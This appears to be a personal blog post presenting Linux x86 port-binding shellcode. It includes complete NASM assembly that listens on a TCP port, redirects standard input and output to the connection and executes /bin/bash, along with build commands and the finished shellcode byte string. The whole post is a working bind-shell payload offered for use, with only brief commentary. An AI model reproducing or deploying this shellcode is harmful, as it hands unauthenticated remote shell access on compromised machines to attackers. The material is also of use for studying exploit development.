in the name of zero

my linux port binding shellcode 
 ; see portbind_c and portbind_asm
 
 
 ; stack layout
 ; [esp+0x0]  | struct sockaddr_in       |
 ; [esp+0x8]  | sys_socketcall args      |
 ; [esp+0x14] |                          
 
         global _start
 section .text
 _start:
         xor eax, eax                    ; eax = 0
         lea esp, [esp-24]
         and esp, -16
 
         mov byte [esp], 0x2             ; sockaddr_in.sin_family
         mov dword [esp+4], eax          ; sockaddr_in.sin_addr.s_addr
         mov word [esp+2], 0xDEAD        ; sockaddr_in.sin_port
 
         ; sys_socket()
         inc eax 
         mov [esp+12], eax
         inc eax 
         mov [esp+8], eax
         xor ebx, ebx
         mov [esp+16], ebx
 
         inc ebx                         ; sys_socket
         lea ecx, [esp+8] 
         mov al, 102                     ; sys_socketcall
         int 0x80
 
         ; sys_bind()
         mov edx, eax                    ; save socket descriptor
         mov [esp+8], eax
         mov [esp+12], esp
         mov byte [esp+16], 0x10
         inc ebx                         ; sys_bind
         lea ecx, [esp+8] 
         mov al, 102 
         int 0x80
                 
         ; sys_listen()
         mov [esp+8], edx                ; socket descriptor
         inc eax 
         mov [esp+12], eax               ; int backlog
         inc ebx 
         inc ebx                         ; sys_listen
         lea ecx, [esp+8] 
         mov al, 102 
         int 0x80

         ; sys_accept()
         mov [esp+12], eax
         mov [esp+16], eax
         inc ebx
         lea ecx, [esp+8]
         mov al, 102
         int 0x80
 
         ; sys_dup2
         mov ebx, eax                    ; int oldfd
         xor ecx, ecx                    ; stdin
         mov al, 0x3f
         int 0x80
         inc ecx                         ; stdout
         mov al, 0x3f
         int 0x80
         inc ecx                         ; stderr
         mov al, 0x3f
         int 0x80
 
         jmp short .setup
 
 .payload:
         pop ebx
         xor edx, edx
         mov [esp+4], ebx
         mov [esp+8], edx
         xor eax, eax
         mov al, 11
         lea ecx, [esp+4]
         int 0x80
 
 .setup
         call .payload
         db '/bin/bash'
and i got to use my super handy dandy, lame disassembly to shellcode transcriber thingy (genshc) too!
steph@heaven ~/workdir $ nasm -f elf portbind_shellcode.asm
steph@heaven ~/workdir $ ld -s -o portbind_shellcode portbind_shellcode.o
steph@heaven ~/workdir $ objdump -d portbind_shellcode | ./genshc
char shellcode[]="\x31\xc0\x8d\x64\x24\xe8\x81\xe4\xf0\xff\xff\xff\xc6\x04
\x24\x02\x89\x44\x24\x04\x66\xc7\x44\x24\x02\xed\xda\x40\x89\x44\x24\x0c\x40\x89
\x44\x24\x08\x31\xdb\x89\x5c\x24\x10\x43\x8d\x4c\x24\x08\xb0\x66\xcd\x80\x89\xc2
\x89\x44\x24\x08\x89\x64\x24\x0c\xc6\x44\x24\x10\x10\x43\x8d\x4c\x24\x08\xb0\x66
\xcd\x80\x89\x54\x24\x08\x40\x89\x44\x24\x0c\x43\x43\x8d\x4c\x24\x08\xb0\x66\xcd
\x80\x89\x44\x24\x0c\x89\x44\x24\x10\x43\x8d\x4c\x24\x08\xb0\x66\xcd\x80\x89\xc3
\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\xeb\x15\x5b\x31
\xd2\x89\x5c\x24\x04\x89\x54\x24\x08\x31\xc0\xb0\x0b\x8d\x4c\x24\x04\xcd\x80\xe8
\xe6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
(notice that i applied formatting to the output. it's supposed to be a one liner but that will screw things up in my blog)

tidings, - steph